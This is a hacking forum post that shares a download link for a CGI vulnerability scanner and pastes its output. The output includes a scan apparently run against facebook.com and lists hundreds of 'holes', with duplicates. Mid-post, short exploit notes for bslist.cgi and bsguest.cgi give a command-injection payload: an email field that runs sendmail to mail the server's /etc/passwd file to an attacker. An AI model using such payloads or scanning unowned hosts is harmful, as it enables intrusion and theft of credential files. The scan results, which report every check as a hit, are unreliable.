Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

Code: Select all

Download : http://www.ziddu.com/download/9644394/CGIVulnerabilityScan.zip.html

Code: Select all

Mode: Scan for all CGI holes (Total: 495)

Hole found: iss ../..
Hole found: logs

Scan Complete - 2 holes found.

Code: Select all

Host: http://www.facebook.com/
Mode: Scan for all CGI holes (Total: 495)

Hole found: config.sys
Hole found: .fhp
Hole found: access.cnf
Hole found: access.cnf
Hole found: achg.htr
Hole found: addcontent.cfm
Hole found: add_ftp.cgi
Hole found: admcgi contents
Hole found: admin.dll
Hole found: admin.php3
Hole found: admin.pwd
Hole found: administrat.pwd
Hole found: admnlogin
Hole found: advsearch.asp
Hole found: aexp.htr
Hole found: aexp2
Hole found: aexp2.htr
Hole found: aexp2b.htr
Hole found: aexp3.htr
Hole found: aexp4.htr
Hole found: aexp4b.htr
Hole found: aglimpse
Hole found: alibaba hole
Hole found: AnForm2
Hole found: anot.htr
Hole found: anot3.htr
Hole found: AnyBoard.cgi
Hole found: AnyForm2
Hole found: application.cfm
Hole found: application.cfm
Hole found: archie
Hole found: architext_q.cgi
Hole found: args.bat
Hole found: args.bat
Hole found: args.cmd
Hole found: args.cmd
Hole found: ASPSeek
Hole found: AT-admin
Hole found: AT-generate.cgi
Hole found: author.dll
Hole found: authors.pwd
Hole found: autoexec.bat
Hole found: aux check
Hole found: ax-admin.cgi
Hole found: ax.cgi
Hole found: axs.cgi
Hole found: bb-hist.sh
Hole found: bb-hist.sh
Hole found: bdir.htr - sampl
Hole found: beaninfo.cfm
Hole found: bigconf.cgi
Hole found: bizdb1-search.cgi
Hole found: bnbform.cgi
Hole found: Boa?? 8-)
Hole found: BOOZT!
Hole found: bsguest.cgi
Hole found: bslist.cgi
Hole found: c32web.exe 2
Hole found: c32web.exe
Hole found: cachemgr.cgi
Hole found: calendar
Hole found: campas
Hole found: carbo.dll
Hole found: cart.pl
Hole found: cart32.exe
Hole found: cart32clientlist

Code: Select all

 ASPSeek
ASPSeek is an open source search engine software developed by SWsoft. 
Several buffer overflow vulnerabilities enable remote attackers to execute code on the web server remotely, with the privileges of the web server. 
Exploit:
Code to large to include here. Check a vulnerability search engine for more information.

Code: Select all

bnbform.cgi
form sends a responding email to users with the contents of any file contained in the 'automessage' variable. This can be used to specify any file that is readable by the uid of the webserver.
Exploit:
The exploit is an html form, but was too large to include here. Please search for "bnbform exploit" at a good search engine to get the code.

Code: Select all

bslist.cgi
BSList doesn't filter out ; allowing anyone to execute commands on the server. 
Exploit:
This can be exploited by signing up for the mailing list with the email address of:
[email protected];/usr/sbin/sendmail [email protected] < /etc/passwd

Code: Select all

bsguest.cgi
The attacker just enters his email address as:
[email protected];/usr/sbin/sendmail [email protected] < /etc/passwd
and then the server mails a confirmation letter along with the passwd file to the attacker. 

Code: Select all

Mode: Scan for all CGI holes (Total: 495)

Hole found: config.sys
Hole found: .fhp
Hole found: access.cnf
Hole found: access.cnf
Hole found: achg.htr
Hole found: addcontent.cfm
Hole found: add_ftp.cgi
Hole found: admcgi contents
Hole found: admin.dll
Hole found: admin.php3
Hole found: admin.pwd
Hole found: administrat.pwd
Hole found: adminlogin
Hole found: admnlogin
Hole found: advsearch.asp
Hole found: aexp.htr
Hole found: aexp2
Hole found: aexp2.htr
Hole found: aexp2b.htr
Hole found: aexp3.htr
Hole found: aexp4.htr
Hole found: aexp4b.htr
Hole found: aglimpse
Hole found: Agoracgi
Hole found: ali check
Hole found: ali get32.exe
Hole found: alibaba hole
Hole found: AnForm2
Hole found: anot.htr
Hole found: anot3.htr
Hole found: AnyBoard.cgi
Hole found: AnyForm2
Hole found: application.cfm
Hole found: application.cfm
Hole found: archie
Hole found: architext_q.cgi
Hole found: args.bat
Hole found: args.bat
Hole found: args.cmd
Hole found: args.cmd
Hole found: ASPSeek
Hole found: AT-admin
Hole found: AT-generate.cgi
Hole found: Auth
Hole found: author.dll
Hole found: authors.pwd
Hole found: autoexec.bat
Hole found: aux check
Hole found: ax-admin.cgi
Hole found: ax.cgi
Hole found: axs.cgi
Hole found: bb-hist.sh
Hole found: bb-hist.sh
Hole found: bdir.htr - sampl
Hole found: beaninfo.cfm
Hole found: bigconf.cgi
Hole found: bizdb1-search.cgi
Hole found: bnbform.cgi
Hole found: Boa?? 8-)
Hole found: BOOZT!
Hole found: bsguest.cgi
Hole found: bslist.cgi
Hole found: c32web.exe 2
Hole found: c32web.exe
Hole found: cachemgr.cgi
Hole found: calendar
Hole found: calender.pl
Hole found: campas
Hole found: carbo.dll
Hole found: cart.pl
Hole found: cart32.exe
Hole found: cart32clientlist
Hole found: catalog.nsf
Hole found: catalog_type.asp
Hole found: catalog_type.asp
Hole found: cc.txt 2
Hole found: cc.txt
Hole found: cfappman
Hole found: cfdocs/root.cfm
Hole found: cfdocs/zero.cfm
Hole found: cfexamples.mdb
Hole found: cfmlsyntaxcheck
Hole found: cfmsytcheck
Hole found: cfsnippets.mdb
Hole found: CGI Counter
Hole found: cgi-lib.pl
Hole found: cgi/cgiproc
Hole found: cgiback.cgi
Hole found: CGImail.exe
Hole found: cgitest.exe
Hole found: cgiwrap
Hole found: classified cgi
Hole found: classifieds.cgi
Hole found: code.php3
Hole found: codebrws.asp 2
Hole found: codebrws.asp
Hole found: com1 check
Hole found: com2 check
Hole found: com3 check
Hole found: con check
Hole found: con/con check
Hole found: config/check.txt
Hole found: config/import.txt
Hole found: config/site.csc
Hole found: convert.bas
Hole found: convert.bas
Hole found: Count.cgi
Hole found: counter.exe
Hole found: cpshost.dll
Hole found: CrazyWWWBoard
Hole found: ct.htx
Hole found: ctgestb.htx
Hole found: ctgestb.idc
Hole found: ctguestb.idc
Hole found: ctss.idc
Hole found: CSVForm
Hole found: cypress.mdb
Hole found: c_download.cgi
Hole found: data/forums.mdb
Hole found: data/realm.mdb
Hole found: database.nsf/
Hole found: DataBase/
Hole found: day5
Hole found: day5a
Hole found: day5copier.cgi
Hole found: dbmlparser.exe
Hole found: DCForum
Hole found: detail.cfm
Hole found: details.htx
Hole found: details.idc
Hole found: details.idc
Hole found: dfire.cgi
Hole found: dig.cgi
Hole found: dig.cgi
Hole found: displayopenedfile.cfm
Hole found: displayTC.pl
Hole found: dispopenfile.cfm
Hole found: docs/codebrws.asp
Hole found: domcfg
Hole found: domcfg.nsf
Hole found: domcfg?open
Hole found: domlog.nsf
Hole found: dos checking
Hole found: download.cgi
Hole found: dsnform.exe
Hole found: dump
Hole found: dvwssr.dll
Hole found: eatme.ida
Hole found: eatme.idc
Hole found: eatme.idq
Hole found: eatme.idw
Hole found: eatme.pl
Hole found: echo.bat
Hole found: edit.pl
Hole found: Email List
Hole found: enter.cgi
Hole found: environ.cgi
Hole found: envout.bat
Hole found: evaluate.cfm
Hole found: ews
Hole found: excite
Hole found: expeval/eval.cfm
Hole found: exprcalc.cfm
Hole found: exprcalc.cfm
Hole found: expressions.cfm
Hole found: EZshopper
Hole found: FAQmanager
Hole found: Fax Survey
Hole found: fileexist.cfm
Hole found: fileexists.cfm
Hole found: fileexists.cfm
Hole found: filemail.cgi
Hole found: filemail.pl
Hole found: files.pl
Hole found: Finger
Hole found: Finger1
Hole found: flexform.cgi
Hole found: fm_shell.asp
Hole found: form.cgi
Hole found: FormHandler.cgi
Hole found: formmail
Hole found: form_results.htm
Hole found: form_results.htm
Hole found: form_results.txt
Hole found: form_results.txt
Hole found: forums_.mdb
Hole found: Fpadmcgi.exe
Hole found: fpadmin.htm
Hole found: fpcount.exe
Hole found: fpcount.exe
Hole found: fpexplore.exe
Hole found: getdoc.cgi
Hole found: getdrvrs.exe
Hole found: getdrvrs.exe
Hole found: getdrvs.exe
Hole found: GetFile.cfm
Hole found: getfile.cfm?
Hole found: gettempdirectory
Hole found: gH.cgi
Hole found: glimpse
Hole found: guestbook.cgi
Hole found: guestbook.pl
Hole found: Guestserver
Hole found: GW5/GWWEB.EXE
Hole found: Handler
Hole found: handler1
Hole found: hello.bat
Hole found: howitworks/codebrws.asp
Hole found: HTML Script
Hole found: htmldocs
Hole found: htsearch
Hole found: iBill Password Management
Hole found: icat
Hole found: ICQweb
Hole found: iisadmin default
Hole found: iisadmin dir
Hole found: iisadmin/ism.dll
Hole found: iisadmpwd
Hole found: iisadmpwd1
Hole found: iisadmpwd2
Hole found: iisadmpwd3
Hole found: iisadmpwd4
Hole found: iisadmpwd5
Hole found: iisadmpwd6
Hole found: iisadmpwd7
Hole found: iisadmpwd8
Hole found: ikonboard
Hole found: imagemap.exe
Hole found: index.asp%81
Hole found: index.asp::$DATA
Hole found: info2www
Hole found: input.bat
Hole found: isapi/srch.htm
Hole found: iss ../..
Hole found: iss dot bug
Hole found: ISS/perl
Hole found: issadmin/bir.htr
Hole found: jdkRqNotify.exe
Hole found: Key to the web
Hole found: Lastlines
Hole found: LinkMax2
Hole found: load_webenv
Hole found: log
Hole found: log.nsf
Hole found: login.cgi
Hole found: logs
Hole found: lpt check
Hole found: lwgate
Hole found: LWGate
Hole found: lwgate.cgi
Hole found: LWGate.cgi
Hole found: MachineInfo
Hole found: MachineInfo
Hole found: maillist.cgi
Hole found: maillist.pl
Hole found: mailtest.nhtml
Hole found: mainframeset.cfm
Hole found: man.sh
Hole found: message.cgi
Hole found: meta.pl
Hole found: minimal.exe
Hole found: mkilog.exe
Hole found: mlog.phtml
Hole found: mountain.cfg
Hole found: mountain.cfg
Hole found: msadc
Hole found: msadc adctest.asp
Hole found: msadcs.dll
Hole found: names.nsf
Hole found: ncl_items.html
Hole found: netauth
Hole found: newdsn.exe
Hole found: newdsn.exe
Hole found: newdsn.exe
Hole found: newpro.cgi
Hole found: news.cgi
Hole found: nlog-smb.cgi
Hole found: nph-error.pl
Hole found: nph-publish
Hole found: nph-test-cgi
Hole found: ntitar.pl
Hole found: openfile.cfm
Hole found: openfile.cfm
Hole found: orders.htm
Hole found: orders.txt
Hole found: orders/checks.txt
Hole found: orders/import.txt
Hole found: parks/detail.cfm
Hole found: passwd
Hole found: passwd.php3
Hole found: passwd.txt
Hole found: password
Hole found: password.txt
Hole found: PDGorderlog
Hole found: perl
Hole found: perl.exe
Hole found: perlshop.cgi
Hole found: PF Display
Hole found: pfdisplay
Hole found: PGPMail
Hole found: PHF
Hole found: PHF.cgi
Hole found: PHF.pp
Hole found: php
Hole found: PHP
Hole found: PHP
Hole found: PHP-Nuke
Hole found: plusmail
Hole found: Poll It
Hole found: postinfo.asp
Hole found: post_query
Hole found: ppdscgi.exe
Hole found: printenv
Hole found: PSCOErrPage.htm
Hole found: publisher
Hole found: PWD
Hole found: PWL
Hole found: query
Hole found: query.asp
Hole found: query.htx
Hole found: query.idc
Hole found: queryhit.htm
Hole found: quikstore.cfg
Hole found: Ralfs chat cgi
Hole found: rdist/expand.c ?
Hole found: realm_.mdb
Hole found: redir.exe
Hole found: redirect
Hole found: register.htm
Hole found: register.htm
Hole found: register.htx
Hole found: register.idc
Hole found: register.txt
Hole found: registrations 2
Hole found: registrations
Hole found: repost.asp
Hole found: responder.cgi
Hole found: rguest.exe
Hole found: rmp_query
Hole found: Robpoll
Hole found: root
Hole found: rpm_query hmm?
Hole found: Sambar
Hole found: sample.htx
Hole found: sample.idc
Hole found: sample2.htx
Hole found: scripts
Hole found: scripts list
Hole found: scripts/run.exe
Hole found: scripts1
Hole found: scripts2
Hole found: scripts3
Hole found: Scriptsa
Hole found: scrp perl?
Hole found: search
Hole found: search.cgi
Hole found: search97.vts
Hole found: secure/.htaccess
Hole found: secure/.wwwacl
Hole found: sendform
Hole found: sendmail.cfm
Hole found: sendmail.cfm
Hole found: SendPage
Hole found: senvironment
Hole found: service.cnf
Hole found: service.cnf
Hole found: service.pwd
Hole found: service.stp
Hole found: service.stp
Hole found: services.cnf
Hole found: services.cnf
Hole found: session
Hole found: SGI infosrch
Hole found: shopper.conf
Hole found: Shopping Cart
Hole found: ShopPlus
Hole found: showcode.asp
Hole found: shtml.dll
Hole found: shtml.exe
Hole found: site.csc
Hole found: siteUserMod.cgi
Hole found: SIX-webboard
Hole found: smpolicy.mdb
Hole found: snorkerz.bat
Hole found: snorkerz.cmd
Hole found: sojourn.cgi
Hole found: sourcewindow.cfm
Hole found: spin_client.cgi
Hole found: srchadm
Hole found: srhadm/admin.idq
Hole found: ss.cfg
Hole found: startstop.html
Hole found: stats
Hole found: stats.prg
Hole found: statsconfig
Hole found: status
Hole found: status.cgi
Hole found: storemgr.pw
Hole found: submit.cgi
Hole found: submit.cgi
Hole found: SuSE sdbsearch.cgi
Hole found: survey.cgi
Hole found: svcacl.cnf
Hole found: svcacl.cnf
Hole found: SWC
Hole found: tablebuild.pl
Hole found: TalkBack
Hole found: Technote
Hole found: Test-CGI
Hole found: test-cgi.tcl
Hole found: test.bat
Hole found: test/test.cgi
Hole found: textcounter.pl
Hole found: Textor Webmasters CGI
Hole found: THC - Backdoor
Hole found: Thinking Arts Store
Hole found: tidfinder.cgi
Hole found: tigvote.cgi
Hole found: today.nsf
Hole found: tools/getdrvrs
Hole found: tools/newdsn.exe
Hole found: tpgnrock
Hole found: tst.bat
Hole found: ultraboard.cgi
Hole found: ultraboard.pl
Hole found: unlg1.1
Hole found: unlg1.2
Hole found: upload
Hole found: upload.asp
Hole found: uploader.exe
Hole found: uploader.exe
Hole found: uploader.exe
Hole found: uploadn.asp
Hole found: uploadx.asp
Hole found: users.pwd
Hole found: view-source
Hole found: view-sousce
Hole found: viewbook.htx
Hole found: viewbook.idc
Hole found: viewexample.cfm
Hole found: viewsrc.cgi
Hole found: visadmin.exe
Hole found: visitor.exe
Hole found: VTI BIN [shtml.dll]
Hole found: VTI BIN [shtml.exe]
Hole found: VTI INF [_vti_inf.html]
Hole found: VTI PVT [administrators.pwd]
Hole found: VTI PVT [authors.pwd]
Hole found: VTI PVT [service.pwd]
Hole found: VTI PVT [users.pwd]
Hole found: vti_bin list
Hole found: w2-msql
Hole found: w3-mspl
Hole found: w3-msql
Hole found: w3proxy.dll
Hole found: w3tvars.pm
Hole found: Wais.pl
Hole found: Web Sendmail
Hole found: webbbs.cgi
Hole found: webbbs.exe
Hole found: webcart/ dir
Hole found: WebDiscount's eShop
Hole found: webdist.cgi
Hole found: WebGais
Hole found: webhits.exe
Hole found: webhits.exe smpl
Hole found: webmap.cgi
Hole found: Webmin
Hole found: WebPage
Hole found: webplus
Hole found: WebSPIRS
Hole found: WebSTART%20LOG
Hole found: webutils.pl
Hole found: WebWho+
Hole found: wguest.exe
Hole found: whois.cgi
Hole found: whois_raw.cgi
Hole found: win-sample.exe
Hole found: wrap
Hole found: wrap1
Hole found: writeto.cnf
Hole found: writeto.cnf
Hole found: www-sql
Hole found: wwwadmin.pl
Hole found: wwwboard.cgi
Hole found: wwwboard.pl
Hole found: wwwuploader.exe
Hole found: wwwwais
Hole found: XITAMI testcgi
Hole found: zml.cgi
Hole found: _vti_adm
Hole found: _vti_aut
Hole found: _vti_aut author
Hole found: _vti_author dll
Hole found: _vti_bin

Scan Complete - 495 holes found.